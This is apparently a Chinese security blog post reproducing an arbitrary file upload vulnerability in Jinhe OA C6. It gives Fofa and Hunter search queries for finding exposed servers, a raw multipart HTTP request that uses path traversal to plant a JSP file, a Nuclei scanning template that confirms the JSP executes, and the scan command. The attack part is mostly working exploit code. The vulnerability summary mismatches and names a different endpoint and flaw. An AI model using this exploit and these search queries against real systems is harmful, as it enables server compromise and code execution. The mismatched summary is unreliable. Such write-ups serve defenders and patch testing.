【漏洞复现】金和OA 任意文件上传

【产品介绍】

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA sap-b1config-aspx接口存在未授权，攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”

Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

1. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
2. Host: 127.0.0.1
3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6. Accept-Encoding: gzip, deflate
7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
8. Connection: close
9. Content-Length: 444
11. ------WebKitFormBoundary5iALAXlSiqxJXrhK
12. Content-Disposition: form-data; name="filename"
14. ../../../../upload/123.jsp
15. ------WebKitFormBoundary5iALAXlSiqxJXrhK
16. Content-Disposition: form-data; name="upLoadFile"; filename="a.jpg"
17. Content-Type: image/jpeg
19. <% out.println("Hello, World!"); %>
20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
21. Content-Disposition: form-data; name="Submit"
23. upload
24. ------WebKitFormBoundary5iALAXlSiqxJXrhK--

成功上传，访问路径upload/123.jsp

【Nuclei-Poc】

1. id: example-file-upload
3. info:
4. name: Example File Upload
5. author: your-name
6. severity: high
8. requests:
9. - raw:
10. - |
11. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
12. Host: {{Hostname}}
13. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
14. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
15. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
16. Accept-Encoding: gzip, deflate
17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
18. Connection: close
20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
21. Content-Disposition: form-data; name="filename"
23. ../../../../upload/test.jsp
24. ------WebKitFormBoundary5iALAXlSiqxJXrhK
25. Content-Disposition: form-data; name="upLoadFile"; filename="test.jpg"
26. Content-Type: image/jpeg
28. <% out.println("Hello, World!"); %>
29. ------WebKitFormBoundary5iALAXlSiqxJXrhK
30. Content-Disposition: form-data; name="Submit"
32. upload
33. ------WebKitFormBoundary5iALAXlSiqxJXrhK--
34. - |
35. GET /upload/test.jsp HTTP/1.1
36. Host: {{Hostname}}
37. Accept: */*
38. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
40. matchers-condition: and
41. matchers:
42. - type: word
43. words:
44. - "Hello, World!"
45. part: body
47. - type: status
48. status:
49. - 200

【验证】

.\nuclei -l 1.txt -t 6.yaml

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。